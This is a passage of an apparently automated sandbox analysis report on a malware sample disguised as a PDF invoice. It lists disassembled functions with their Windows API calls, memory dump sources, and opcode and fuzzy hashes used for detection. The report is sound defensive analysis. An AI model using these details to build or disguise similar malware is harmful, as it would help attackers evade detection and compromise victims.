                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                      • String ID: Listbox
                                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                                      • Opcode ID: 78f3882e556fdf22f920527a326b2863738e4ebd5319fc40c641f95fd00ccc2c
                                                                                                                      • Instruction ID: ff88a553464d4c7dbc7d0a954099f50e8efaee0fc2125caf2ae0a9bb314728a7
                                                                                                                      • Opcode Fuzzy Hash: 78f3882e556fdf22f920527a326b2863738e4ebd5319fc40c641f95fd00ccc2c
                                                                                                                      • Instruction Fuzzy Hash: 68219232611118BFDF118F54DC85FEB37BAEF89764F018125F9159B290CA75AC518BA0
                                                                                                                      Function 007D797D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 007D79E1
                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007D79F6
                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007D7A03
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                                      • Opcode ID: d4d7e263e5b277207d8cdd9b2ab20fac06c6481dce8d7e3ec9a1337719f1104b
                                                                                                                      • Instruction ID: f03b2a935c6e0fdd74f331594ac4f9b2d6015331c0292b8c92d985282f31ae25
                                                                                                                      • Opcode Fuzzy Hash: d4d7e263e5b277207d8cdd9b2ab20fac06c6481dce8d7e3ec9a1337719f1104b
                                                                                                                      • Instruction Fuzzy Hash: 19110132240208BAEF149F64CC05FEB37B9EF89764F02461AFA41A61D0E275A811CB60
                                                                                                                      Function 00754C95 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00754C2E), ref: 00754CA3
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00754CB5
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                      • API String ID: 2574300362-192647395
                                                                                                                      • Opcode ID: 809736893b40b4e8be8544095975403ce19cb8c9118844299ca10b76235fef0a
                                                                                                                      • Instruction ID: 36668b9b2676f1cccad7ca896742404833973a4629a1891f1c2ca8a2ff72d83f
                                                                                                                      • Opcode Fuzzy Hash: 809736893b40b4e8be8544095975403ce19cb8c9118844299ca10b76235fef0a
                                                                                                                      • Instruction Fuzzy Hash: 8BD017B0512727CFD7209F31DA18A4676F6AF06796B15C83BD897D6250E7B8D8C0CA60
                                                                                                                      Function 00754D61 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00754D2E,?,00754F4F,?,008162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754D6F
                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00754D81
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                      • API String ID: 2574300362-3689287502
                                                                                                                      • Opcode ID: 7f30638b5fcd913f65abd8880d0a0fbe5b4f324662a7013167dab65bce9a44f6
                                                                                                                      • Instruction ID: 21d64c27b12581d715dde38f10ea1138e3a6647057782164c2c31e4d1a906146
                                                                                                                      • Opcode Fuzzy Hash: 7f30638b5fcd913f65abd8880d0a0fbe5b4f324662a7013167dab65bce9a44f6
                                                                                                                      • Instruction Fuzzy Hash: 74D08271A00B13CFE7208F30C80824272F8AF00352B10C83AD893C2290E6BCD8808A60
                                                                                                                      Function 00754D94 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00754CE1,?), ref: 00754DA2
                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00754DB4
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                      • API String ID: 2574300362-1355242751
                                                                                                                      • Opcode ID: f2fa2ad26d2a1dffec4d81c410250f902727418ee4305378705b7fa4fafaabc4
                                                                                                                      • Instruction ID: c98f3dd0c29209613b0c738a07357ce739e21b7e0fbfb0a59d8acb09b829550c
                                                                                                                      • Opcode Fuzzy Hash: f2fa2ad26d2a1dffec4d81c410250f902727418ee4305378705b7fa4fafaabc4
                                                                                                                      • Instruction Fuzzy Hash: EED01771A51B13DFD7209F31D808A8676F5AF0535AB15C83BD8D6D6290E7BCD8C0CA60
                                                                                                                      Function 007D1072 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,007D12C1), ref: 007D1080
                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007D1092
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                      • API String ID: 2574300362-4033151799
                                                                                                                      • Opcode ID: a0fc841c2835412b63d2450cf929686cf70b86c03a95259f40b993039e2b149e
                                                                                                                      • Instruction ID: 6f86e5e37ecbbbaa54ac6109a24184d61bb7b3818f0b343cc13128bc752b4adf
                                                                                                                      • Opcode Fuzzy Hash: a0fc841c2835412b63d2450cf929686cf70b86c03a95259f40b993039e2b149e
                                                                                                                      • Instruction Fuzzy Hash: F7D0E230511712EFD720AB75D819A1A76F4AF05761B19C82AE4AADA290E778C8808A50
                                                                                                                      Function 007C93F5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,007C9009,?,007DF910), ref: 007C9403
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 007C9415
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                      • API String ID: 2574300362-199464113
                                                                                                                      • Opcode ID: d16fe76e306b3fc23c2d1d90b5e1f9d5b96d9d942c05d65e8d8b16be84c221e8
                                                                                                                      • Instruction ID: cd9fffeaa4656e5a3391fda3fa9f8ec178ff5115156cd27b3f660ad853cc9c9b
                                                                                                                      • Opcode Fuzzy Hash: d16fe76e306b3fc23c2d1d90b5e1f9d5b96d9d942c05d65e8d8b16be84c221e8
                                                                                                                      • Instruction Fuzzy Hash: D7D01774511717CFD7249F31DA0CA0777E6AF15351B25C83FE596D6690E778C880CA60
                                                                                                                      Function 00791B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LocalTime__swprintf
                                                                                                                      • String ID: %.3d$WIN_XPe
                                                                                                                      • API String ID: 2070861257-2409531811
                                                                                                                      • Opcode ID: 7a45c52b5268c14cfd25f8c07e7500489177bc7c7b94dd6a648c5df9c4910755
                                                                                                                      • Instruction ID: 4153041f3c421e9e46e420aaf466b46c71d24b6275e3b75d4bdea68432a8ea01
                                                                                                                      • Opcode Fuzzy Hash: 7a45c52b5268c14cfd25f8c07e7500489177bc7c7b94dd6a648c5df9c4910755
                                                                                                                      • Instruction Fuzzy Hash: F0D012F580421AEACF459A90EC449FD737DBB08311F9045D2F906D1440F27D9BA4AB25
                                                                                                                      Function 007A76C5 Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 93c0ae50e357456ed23d5767d38b35d594f06d394f1355a14de9f62d7d5ce26a
                                                                                                                      • Instruction ID: 7fee74a42be2072357eb0a47b56ce775a340647552ef3b4da6e72bc198507cc6
                                                                                                                      • Opcode Fuzzy Hash: 93c0ae50e357456ed23d5767d38b35d594f06d394f1355a14de9f62d7d5ce26a
                                                                                                                      • Instruction Fuzzy Hash: 53C17175A04216EFCB18CFA8CC84E6EB7B5FF89710B118699E805EB251D734ED81DB90
                                                                                                                      Function 007CE33E Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 007CE3D2
                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 007CE415
                                                                                                                        • Part of subcall function 007CDAB9: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 007CDAD9
                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007CE615
                                                                                                                      • _memmove.LIBCMT ref: 007CE628
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3659485706-0
                                                                                                                      • Opcode ID: 80339e963c1eb834efb29d34fed8ad9031770a9786a2500205e6a21b7975413c
                                                                                                                      • Instruction ID: 3e423ce1cbbdcbf49e95b9fb13f369c4634ecba0879aee33934427fd766bec00
                                                                                                                      • Opcode Fuzzy Hash: 80339e963c1eb834efb29d34fed8ad9031770a9786a2500205e6a21b7975413c
                                                                                                                      • Instruction Fuzzy Hash: 8EC17B71608341DFCB14DF28C484A6ABBE4FF88314F14896DF89A9B351D775EA45CB82
                                                                                                                      Function 007C83A8 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 007C83D8
                                                                                                                      • CoUninitialize.OLE32 ref: 007C83E3
                                                                                                                        • Part of subcall function 007ADA5D: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 007ADAC5
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 007C83EE
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 007C86BF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 780911581-0
                                                                                                                      • Opcode ID: a8af491d43ff564690e482b38156888a2a3eead4cbd651bb29fd72aa811db1db
                                                                                                                      • Instruction ID: c2caa14dbc9c18be54a05ff4bb84aea676f425203c1e5e02b1b8e2d5ec133dc3
                                                                                                                      • Opcode Fuzzy Hash: a8af491d43ff564690e482b38156888a2a3eead4cbd651bb29fd72aa811db1db
                                                                                                                      • Instruction Fuzzy Hash: B2A1E275204601DFCB50DF24C485B6AB7E4BF88315F18845DFA9AAB3A2CB78ED04CB56
                                                                                                                      Function 007A6DF3 Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$AllocClearCopyInitString
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2808897238-0
                                                                                                                      • Opcode ID: c67e3095e576eac19da6ecc38dc1ee8f6f596f95f3348aba04f3e1a49b23cc28
                                                                                                                      • Instruction ID: 028a25418ff1fb8cc3ddfbf34d06ec2df7dea69197ee10908ee56351a929f00d
                                                                                                                      • Opcode Fuzzy Hash: c67e3095e576eac19da6ecc38dc1ee8f6f596f95f3348aba04f3e1a49b23cc28
                                                                                                                      • Instruction Fuzzy Hash: 7F51E930608301DEDB289F75D895A6AB3E5AF8A310F24891FE656CB291EB7C9840DB11
                                                                                                                      Function 007D9A63 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetWindowRect.USER32(0190DB70,?), ref: 007D9AD2
                                                                                                                      • ScreenToClient.USER32(00000002,00000002), ref: 007D9B05
                                                                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 007D9B72
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ClientMoveRectScreen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3880355969-0
                                                                                                                      • Opcode ID: d2e65ee7f1231d38afdbf2e158ebd5f10c620144360da99510d98602b6d57e76
                                                                                                                      • Instruction ID: c965d9728da15dfd94daeccb1556f2a09c8d29c1e3f4798b466d138e5671bcea
                                                                                                                      • Opcode Fuzzy Hash: d2e65ee7f1231d38afdbf2e158ebd5f10c620144360da99510d98602b6d57e76
                                                                                                                      • Instruction Fuzzy Hash: D3511A75A01209EFCF10DF68D880AAE7BB6FF45320F15826AF9559B390D734AD91CB90
                                                                                                                      Function 007C6CBD Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 007C6CE4
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 007C6CF4
                                                                                                                        • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                                                                                                                        • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                                                                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 007C6D58
                                                                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 007C6D64
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2214342067-0
                                                                                                                      • Opcode ID: 44b515b77ecb48b2e7f63377eb85a6ddb68445d163df3051b7c2bda0d5f0be60
                                                                                                                      • Instruction ID: 6d080084b3b37722c6fa8967244faaaae4d36b566f3e26884de5cf8a6771e696
                                                                                                                      • Opcode Fuzzy Hash: 44b515b77ecb48b2e7f63377eb85a6ddb68445d163df3051b7c2bda0d5f0be60
                                                                                                                      • Instruction Fuzzy Hash: FC417F74740200EFEB10AF24DC8AFAA77E59B44B10F44C01DFA5AAB2D2DBB99D048791
                                                                                                                      Function 007C672D Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,007DF910), ref: 007C67BA
                                                                                                                      • _strlen.LIBCMT ref: 007C67EC
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _strlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4218353326-0
                                                                                                                      • Opcode ID: 8213264a554091e4cab8e42fc4cc72e004028eefc3962543f9e6c1c8171b99ac
                                                                                                                      • Instruction ID: ffbbede0cb682cf346fae99ffb09c6b9eaefc540bd68be0358906361139fcbea
                                                                                                                      • Opcode Fuzzy Hash: 8213264a554091e4cab8e42fc4cc72e004028eefc3962543f9e6c1c8171b99ac
                                                                                                                      • Instruction Fuzzy Hash: 0F417F71A00104EBCB14EB64DCD9FEEB7E9AF48314F14816DF91A9B292EB78AD04C751
                                                                                                                      Function 007BBA5F Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 007BBB09
                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 007BBB2F
